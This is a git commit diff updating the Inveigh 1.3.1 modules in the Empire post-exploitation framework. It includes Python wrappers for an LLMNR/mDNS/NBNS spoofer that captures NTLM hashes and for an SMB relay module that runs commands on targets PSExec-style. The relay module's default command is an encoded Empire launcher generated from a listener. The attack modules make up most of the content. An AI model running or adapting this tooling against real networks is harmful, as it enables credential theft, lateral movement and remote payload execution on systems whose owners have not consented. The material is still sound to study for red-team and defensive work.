Inveigh 1.3.1 Modules

Sync with Inveigh 1.3.1.
mdns
Kevin Robertson 2017-04-09 16:37:51 -04:00
parent dd13b13604
commit 534218cf31
6 changed files with 7245 additions and 3750 deletions

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@ -9,13 +9,15 @@ class Module:
'Author': ['Kevin Robertson'],
'Description': ('Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool.'),
'Description': ('Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. Note '
'that this module exposes only a subset of Inveigh\'s parameters. Inveigh can be used '
'through Empire\'s scriptimport and scriptcmd if additional parameters are needed.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : True,
'NeedsAdmin' : False,
'OpsecSafe' : True,
@ -37,141 +39,152 @@ class Module:
'Required' : True,
'Value' : ''
},
'IP' : {
'Description' : 'Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the SpooferIP parameter is not set.',
'ConsoleOutput' : {
'Description' : '(Low/Medium/Y) Default = Y: Enable/Disable real time console output. Medium and Low can be used to reduce output.',
'Required' : False,
'Value' : ''
},
'SpooferIP' : {
'Description' : 'Specific IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.',
'Required' : False,
'Value' : ''
},
'SpooferHostsReply' : {
'Description' : 'Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.',
'Required' : False,
'Value' : ''
},
'SpooferHostsIgnore' : {
'Description' : 'Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.',
'Required' : False,
'Value' : ''
},
'SpooferIPsReply' : {
'Description' : 'Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.',
'Required' : False,
'Value' : ''
},
'SpooferIPsIgnore' : {
'Description' : 'Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.',
'Required' : False,
'Value' : ''
},
'SpooferRepeat' : {
'Description' : 'Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'LLMNR' : {
'Description' : 'Enable/Disable LLMNR spoofing (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'LLMNRTTL' : {
'Description' : 'Custom LLMNR TTL in seconds for the response packet.',
'Required' : False,
'Value' : ''
},
'NBNS' : {
'Description' : 'Enable/Disable NBNS spoofing (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'NBNSTTL' : {
'Description' : 'Custom NBNS TTL in seconds for the response packet.',
'Required' : False,
'Value' : ''
},
'NBNSTypes' : {
'Description' : 'Comma separated list of NBNS types to spoof.',
'Required' : False,
'Value' : '00,20'
},
'HTTP' : {
'Description' : 'Enable/Disable HTTP challenge/response capture (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'HTTPAuth' : {
'Description' : 'HTTP server authentication type. This setting does not apply to wpad.dat requests (Anonymous,Basic,NTLM).',
'Required' : False,
'Value' : 'NTLM'
},
'HTTPBasicRealm' : {
'Description' : 'Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.',
'Required' : False,
'Value' : 'IIS'
},
'HTTPResponse' : {
'Description' : 'String or HTML to serve as the default HTTP response. This response will not be used for wpad.dat requests. Do not wrap in quotes and use PowerShell character escapes where necessary.',
'Required' : False,
'Value' : ''
},
'WPADAuth' : {
'Description' : 'HTTP server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts (Anonymous,Basic,NTLM).',
'Required' : False,
'Value' : 'NTLM'
},
'WPADEmptyFile' : {
'Description' : 'Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'WPADIP' : {
'Description' : 'Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.',
'Required' : False,
'Value' : ''
},
'WPADPort' : {
'Description' : 'Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.',
'Required' : False,
'Value' : ''
},
'WPADDirectHosts' : {
'Description' : 'Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. Add the Empire host to avoid catching Empire HTTP traffic.',
'Required' : False,
'Value' : ''
},
'SMB' : {
'Description' : 'Enable/Disable SMB challenge/response capture (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'Challenge' : {
'Description' : 'Specific 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.',
'Required' : False,
'Value' : ''
},
'MachineAccounts' : {
'Description' : 'Enable/Disable showing NTLM challenge/response captures from machine accounts (Y/N).',
'Required' : False,
'Value' : 'N'
},
'ConsoleStatus' : {
'Description' : 'Interval in minutes for auto-displaying all unique captured hashes and credentials. (Y/N)',
'Description' : 'Interval in minutes for displaying all unique captured hashes and credentials. This will display a clean list of captures in Empire.',
'Required' : False,
'Value' : ''
},
'ConsoleUnique' : {
'Description' : 'Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations.',
'Description' : '(Y/N) Default = Y: Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations.',
'Required' : False,
'Value' : 'Y'
'Value' : ''
},
'ElevatedPrivilege' : {
'Description' : '(Auto/Y/N) Default = Auto: Set the privilege mode. Auto will determine if Inveigh is running with elevated privilege. If so, options that require elevated privilege can be used.',
'Required' : False,
'Value' : ''
},
'HTTP' : {
'Description' : '(Y/N) Default = Y: Enable/Disable HTTP challenge/response capture.',
'Required' : False,
'Value' : ''
},
'HTTPAuth' : {
'Description' : '(Anonymous/Basic/NTLM/NTLMNoESS) HTTP listener authentication type. This setting does not apply to wpad.dat requests.',
'Required' : False,
'Value' : ''
},
'HTTPContentType' : {
'Description' : 'Content type for HTTP/Proxy responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse.',
'Required' : False,
'Value' : ''
},
'HTTPResponse' : {
'Description' : 'Content to serve as the default HTTP/Proxy response. This response will not be used for wpad.dat requests. Use PowerShell escape characters and newlines where necessary. This paramater will be wrapped in double quotes by this module.',
'Required' : False,
'Value' : ''
},
'Inspect' : {
'Description' : '(Switch) Inspect LLMNR, mDNS, and NBNS traffic only.',
'Required' : False,
'Value' : ''
},
'IP' : {
'Description' : 'Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/mDNS/NBNS spoofing if the SpooferIP parameter is not set.',
'Required' : False,
'Value' : ''
},
'LLMNR' : {
'Description' : '(Y/N) Default = Y: Enable/Disable LLMNR spoofer.',
'Required' : False,
'Value' : ''
},
'mDNS' : {
'Description' : '(Y/N) Enable/Disable mDNS spoofer.',
'Required' : False,
'Value' : ''
},
'mDNSTypes' : {
'Description' : '(QU,QM) Default = QU: Comma separated list of mDNS types to spoof. Note that QM will send the response to 224.0.0.251.',
'Required' : False,
'Value' : ''
},
'NBNS' : {
'Description' : '(Y/N) Enable/Disable NBNS spoofer.',
'Required' : False,
'Value' : ''
},
'NBNSTypes' : {
'Description' : 'Default = 00,20: Comma separated list of NBNS types to spoof.',
'Required' : False,
'Value' : ''
},
'Proxy' : {
'Description' : '(Y/N) Enable/Disable Inveigh\'s proxy server authentication capture.',
'Required' : False,
'Value' : ''
},
'ProxyPort' : {
'Description' : 'Default = 8492: TCP port for the Inveigh\'s proxy listener.',
'Required' : False,
'Value' : ''
},
'RunCount' : {
'Description' : 'Number of NTLMv1/NTLMv2 captures to perform before auto-exiting.',
'Required' : False,
'Value' : ''
},
'RunTime' : {
'Description' : 'Run time duration in minutes.',
'Required' : True,
'Value' : ''
},
'SMB' : {
'Description' : '(Y/N) Default = Y: Enable/Disable SMB challenge/response capture.',
'Required' : False,
'Value' : ''
},
'SpooferIP' : {
'Description' : 'Response IP address for spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.',
'Required' : False,
'Value' : ''
},
'SpooferHostsIgnore' : {
'Description' : 'Comma separated list of requested hostnames to ignore when spoofing.',
'Required' : False,
'Value' : ''
},
'SpooferHostsReply' : {
'Description' : 'Comma separated list of requested hostnames to respond to when spoofing.',
'Required' : False,
'Value' : ''
},
'SpooferIPsIgnore' : {
'Description' : 'Comma separated list of source IP addresses to ignore when spoofing.',
'Required' : False,
'Value' : ''
},
'SpooferIPsReply' : {
'Description' : 'Comma separated list of source IP addresses to respond to when spoofing.',
'Required' : False,
'Value' : ''
},
'SpooferLearning' : {
'Description' : '(Y/N) Enable/Disable LLMNR/NBNS valid host learning.',
'Required' : False,
'Value' : ''
},
'SpooferLearningDelay' : {
'Description' : 'Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning.',
'Required' : False,
'Value' : ''
},
'SpooferRepeat' : {
'Description' : '(Y/N) Default = Y: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.',
'Required' : False,
'Value' : ''
},
'WPADAuth' : {
'Description' : '(Anonymous/Basic/NTLM/NTLMNoESS) HTTP listener authentication type for wpad.dat requests.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality

View File

@ -1,177 +0,0 @@
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-InveighBruteForce',
'Author': ['Kevin Robertson'],
'Description': ('Inveigh\'s remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. '
'This module can be used to perform NBNS spoofing across subnets and/or perform NBNS '
'spoofing without an elevated administrator or SYSTEM shell.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/Kevin-Robertson/Inveigh'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'SpooferIP' : {
'Description' : 'Specific IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host.',
'Required' : False,
'Value' : ''
},
'SpooferTarget' : {
'Description' : 'IP address to target for brute force NBNS spoofing.',
'Required' : True,
'Value' : ''
},
'Hostname' : {
'Description' : 'Hostname to spoof with NBNS spoofing.',
'Required' : False,
'Value' : 'WPAD'
},
'NBNS' : {
'Description' : 'Enable/Disable NBNS spoofing (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'NBNSPause' : {
'Description' : 'Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received.',
'Required' : False,
'Value' : ''
},
'NBNSTTL' : {
'Description' : 'Custom NBNS TTL in seconds for the response packet.',
'Required' : False,
'Value' : ''
},
'HTTP' : {
'Description' : 'Enable/Disable HTTP challenge/response capture (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'HTTPAuth' : {
'Description' : 'HTTP server authentication type. This setting does not apply to wpad.dat requests (Anonymous,Basic,NTLM).',
'Required' : False,
'Value' : 'NTLM'
},
'HTTPBasicRealm' : {
'Description' : 'Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.',
'Required' : False,
'Value' : 'IIS'
},
'HTTPResponse' : {
'Description' : 'String or HTML to serve as the default HTTP response. This response will not be used for wpad.dat requests. Do not wrap in quotes and use PowerShell character escapes where necessary.',
'Required' : False,
'Value' : ''
},
'WPADAuth' : {
'Description' : 'HTTP server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts (Anonymous,Basic,NTLM).',
'Required' : False,
'Value' : 'NTLM'
},
'WPADIP' : {
'Description' : 'Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.',
'Required' : False,
'Value' : ''
},
'WPADPort' : {
'Description' : 'Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.',
'Required' : False,
'Value' : ''
},
'WPADDirectHosts' : {
'Description' : 'Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. Add the Empire host to avoid catching Empire HTTP traffic.',
'Required' : False,
'Value' : ''
},
'Challenge' : {
'Description' : 'Specific 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.',
'Required' : False,
'Value' : ''
},
'MachineAccounts' : {
'Description' : 'Enable/Disable showing NTLM challenge/response captures from machine accounts (Y/N).',
'Required' : False,
'Value' : 'N'
},
'RunCount' : {
'Description' : 'Number of captures to perform before auto-exiting.',
'Required' : False,
'Value' : ''
},
'RunTime' : {
'Description' : 'Run time duration in minutes.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-InveighBruteForce.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# set defaults for Empire
script += "\n" + 'Invoke-InveighBruteForce -Tool "2" '
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
if "," in str(values['Value']):
quoted = '"' + str(values['Value']).replace(',', '","') + '"'
script += " -" + str(option) + " " + quoted
else:
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
return script

View File

@ -9,18 +9,20 @@ class Module:
'Author': ['Kevin Robertson'],
'Description': ('Inveigh\'s SMB relay function. This module can be used to relay '
'incoming HTTP NTLMv2 authentication requests to an SMB target. '
'If the authentication is successfully relayed and the account is '
'a local administrator, a specified command will be executed on the '
'target PSExec style. This module works best while also running '
'collection/inveigh with HTTP disabled.'),
'Description': ('Inveigh\'s SMB relay function. This module can be used to relay incoming '
'HTTP/Proxy NTLMv1/NTLMv2 authentication requests to an SMB target. If the '
'authentication is successfully relayed and the account has the correct '
'privilege, a specified command or Empire launcher will be executed on the '
'target PSExec style. This module works best while also running collection/inveigh '
'with HTTP disabled. Note that this module exposes only a subset of Inveigh '
'Relay\'s parameters. Inveigh Relay can be used through Empire\'s scriptimport '
'and scriptcmd if additional parameters are needed.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : True,
'NeedsAdmin' : False,
'OpsecSafe' : False,
@ -42,31 +44,92 @@ class Module:
'Required' : True,
'Value' : ''
},
'SMBRelayTarget' : {
'Description' : 'IP address of system to target for SMB relay.',
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy_' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Command' : {
'Description' : 'Command to execute on relay target. Do not wrap in quotes and use PowerShell escape characters and newlines where necessary.',
'Required' : False,
'Value' : ''
},
'ConsoleOutput' : {
'Description' : '(Low/Medium/Y) Default = Y: Enable/Disable real time console output. Medium and Low can be used to reduce output.',
'Required' : False,
'Value' : ''
},
'ConsoleStatus' : {
'Description' : 'Interval in minutes for displaying all unique captured hashes and credentials. This will display a clean list of captures in Empire.',
'Required' : False,
'Value' : ''
},
'ConsoleUnique' : {
'Description' : '(Y/N) Default = Y: Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations.',
'Required' : False,
'Value' : ''
},
'HTTP' : {
'Description' : '(Y/N) Default = Y: Enable/Disable HTTP challenge/response capture/relay.',
'Required' : False,
'Value' : ''
},
'Proxy' : {
'Description' : '(Y/N) Default = N: Enable/Disable Inveigh\'s proxy server authentication capture/relay.',
'Required' : False,
'Value' : ''
},
'ProxyPort' : {
'Description' : 'Default = 8492: TCP port for Inveigh\'s proxy listener.',
'Required' : False,
'Value' : ''
},
'RunTime' : {
'Description' : 'Run time duration in minutes.',
'Required' : True,
'Value' : ''
},
'SMBRelayCommand' : {
'Description' : 'Command to execute on SMB relay target. Do not wrap in quotes and use PowerShell character escapes where necessary.',
'Service' : {
'Description' : 'Default = 20 character random: Name of the service to create and delete on the target.',
'Required' : False,
'Value' : ''
},
'SMB1' : {
'Description' : '(Switch) Force SMB1.',
'Required' : False,
'Value' : ''
},
'Target' : {
'Description' : 'IP address or hostname of system to target for relay.',
'Required' : True,
'Value' : ''
},
'SMBRelayUsernames' : {
'Usernames' : {
'Description' : 'Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.',
'Required' : False,
'Value' : ''
},
'SMBRelayAutoDisable' : {
'Description' : 'Automaticaly disable SMB relay after a successful command execution on target (Y/N).',
'Required' : False,
'Value' : 'Y'
},
'RunTime' : {
'Description' : 'Run time duration in minutes.',
'WPADAuth' : {
'Description' : '(Anonymous/NTLM) HTTP listener authentication type for wpad.dat requests.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
@ -82,6 +145,12 @@ class Module:
def generate(self):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy_']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
command = self.options['Command']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-InveighRelay.ps1"
@ -96,11 +165,21 @@ class Module:
script = moduleCode
if command == "":
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
command = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
# set defaults for Empire
script += "\n" + 'Invoke-InveighRelay -Tool "2" '
script += "\n" + 'Invoke-InveighRelay -Tool "2" -Command \"%s\"' % (command)
for option,values in self.options.iteritems():
if option.lower() != "agent":
if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "useragent" and option.lower() != "proxy_" and option.lower() != "proxycreds" and option.lower() != "command":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch